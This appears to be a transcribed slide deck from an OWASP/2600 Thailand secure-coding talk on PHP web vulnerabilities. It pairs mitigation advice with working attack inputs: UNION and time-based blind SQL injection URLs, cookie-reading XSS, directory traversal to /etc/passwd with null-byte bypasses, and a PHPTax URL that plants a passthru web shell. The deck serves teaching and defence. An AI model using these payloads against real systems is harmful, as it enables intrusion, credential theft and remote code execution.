Hack and Slash: Secure Coding


Published on

OWASP and 2600 Thailand

Published in: Technology
  • Be the first to comment

Hack and Slash: Secure Coding

  1. 1. Hack and Slash : Secure CodingKrit KadnokPrathan Phongthiproek
  2. 2. The Most Common Vulnerabilities SQL Injection Cross Site Scripting (XSS) File Inclusion Remote Code Execution
  3. 3. SQL Injection SQL Injection Blind SQL Injection
  4. 4. SQL Injection (Cont.)If user enters ‘ UNION SELECT ALL user(), database() #
  5. 5. Blind SQL Injection Normal Blind - Where you get TRUE/FALSE responsesbased on output of SQL query. This is visible changein page. Totally Blind - No change in output for TRUE/FALSEcondition.
  6. 6. Normal BlindVulnerable URL:http://site/vulnerabilities/sqli_blind/?id=1TRUE Response:http://site/vulnerabilities/sqli_blind/?id=1 AND 1=1FALSE Response:http://site/vulnerabilities/sqli_blind/?id=1 AND 1=2Check Version:FALSE Responsehttp://site/vulnerabilities/sqli_blind/?id=1 AND substring(version(),1,1)=4TRUE Responsehttp://site/vulnerabilities/sqli_blind/?id=1 AND substring(version(),1,1)=5
  7. 7. Totally BlindAs this type didnt have any TRUE/FALSE responses, we need to usetime-based injection. Use IF() for condition and BENCHMARK() fortime delay.Check Version:FALSE Responsehttp://site/vulnerabilities/sqli_blind/?id=1 UNION SELECTIF(SUBSTRING(version(),1,1)=4,BENCHMARK(5000000,MD 5(CHAR(1))),null),nullTRUE Responsehttp://site/vulnerabilities/sqli_blind/?id=1 UNION SELECTIF(SUBSTRING(version(),1,1)=5,BENCHMARK(5000000,MD 5(CHAR(1))),null),nullTable name guessing:http://site/vulnerabilities/sqli_blind/?id=1 UNION SELECT IF(SUBSTRING((select 1 fromusers limit 0,1),1,1)=1,BENCHMARK(5000000,MD5(CHAR(1))),null), null
  8. 8. Blind SQL Injection
  9. 9. Case StudyPHD Helpdesk 2.12 SQLi Vulnerability (login.php)
  10. 10. Case StudyPHD Helpdesk 2.12 SQLi VulnerabilitySubmit POST data to login.php Result
  11. 11. Mitigation/Prevention Use of Prepared Statements (Parameterized Queries) Use of Stored Procedures Escaping all User Supplied Input Least Privilege White List Input Validation https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
  12. 12. Cross Site Scripting (XSS) XSS Reflected XSS Stored
  13. 13. XSS Reflected <script>alert(document.cookie)</script>
  14. 14. XSS Stored <script>alert(document.cookie)</script>
  15. 15. Mitigation/Prevention Escape Before Inserting Untrusted Data into HTMLContext Positive or “whitelist” input validation is alsorecommended Use HTTPOnly cookie flag https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet
  16. 16. File Inclusion Include PHP Shell (RFI) Directory Traversal (LFI) Read Code via PHP Stream Filters (PHP://filter) Remote Code Execution (LFI to RCE) Etc
  17. 17. File Inclusion (RFI)RFI not Work !!Allow_url_include is disable
  18. 18. File Inclusion (LFI)LFI Work !!
  19. 19. File Inclusion (PHP Stream)It’s Work !!Allow_url_include is disable
  20. 20. File Inclusion (PHP Stream)<?phpclass Configuration{public $host = "localhost";public $db = "cuppa";public $user = "root";public $password = “mYDb@dm1n;public $table_prefix = "cu_";public $administrator_template = "default";public $list_limit = 25;public $token = "OBqIPqlFWf3X";public $allowed_extensions = "*.bmp; *.csv; *.doc;*.gif; *.ico; *.jpg; *.jpeg; *.odg; *.odp; *.ods; *.odt; *.pdf;*.png; *.ppt; *.swf; *.txt; *.xcf; *.xls; *.docx; *.xlsx";public $upload_default_path = "media/uploadsFiles";public $maximum_file_size = "5242880";public $secure_login = 0;public $secure_login_value = "";public $secure_login_redirect = "";}?>
  21. 21. File Inclusion (LFI to RCE)
  22. 22. File Inclusion (Bypass) Bad Code Bypass it !! Null Byte ?page=../../../../../../../../../../../etc/passwd%00 Path Truncation ?page=../../../../../../../../../../../etc/passwd............. Dot Truncation ?page =../../../../../../../../../../../etc/passwd…………….....
  23. 23. Case Study DevalCMS 1.4a (currentfile) LFI Vulnerability
  24. 24. Case Study DevalCMS 1.4a (currentfile) LFI Vulnerability
  25. 25. Mitigation/Prevention Whitelist
  26. 26. Remote Code Execution Dangerous Function exec system passthru shell_exec proc_open pcntl_exec popen eval assert escapeshellcmd preg_replace call_user_func call_user_func_array Etc
  27. 27. Remote Code Execution
  28. 28. Remote Code Execution
  29. 29. Remote Code Execution (Bypass) PHPTax Remote Code Executionhttp://localhost/phptax/index.php?newvalue=%3C?php%20passthru%28$_GET[cmd]%29;?%3E&field=rce.php
  30. 30. Remote Code Execution
  31. 31. Remote Code Execution PHP-Charts 1.0 (type) RCE Vulnerability
  32. 32. Remote Code Execution PHP-Charts 1.0 (type) RCE Vulnerability
  33. 33. Mitigation/Prevention Ensure that user input is properly validated Limit the use of dynamic inputs from users tovulnerable functions Build a whitelist for positive file names and code withregular expressions (e.g. Alphanumeric only) orarrays. Do not try to blacklist for evil PHP code
  34. 34. Bug Hunting !! Code Review Scan for potential vulnerable functions Traces back its parameter Free Tool !! >> http://sourceforge.net/projects/rips-scanner/
  35. 35. RIPS
  36. 36. Visit => http://www.owasp.org
  37. 37. References http://www.websec.ca/kb/sql_injection https://www.owasp.org/index.php/SQL_Injection https://www.owasp.org/index.php/Cross-site_Scripting_(XSS) https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet https://www.owasp.org/index.php/PHP_File_Inclusion https://www.owasp.org/index.php/Top_10_2007-Malicious_File_Execution http://www.exploit-db.com http://sourceforge.net/projects/rips-scanner
  38. 38. If someone is still in the room..THANK YOU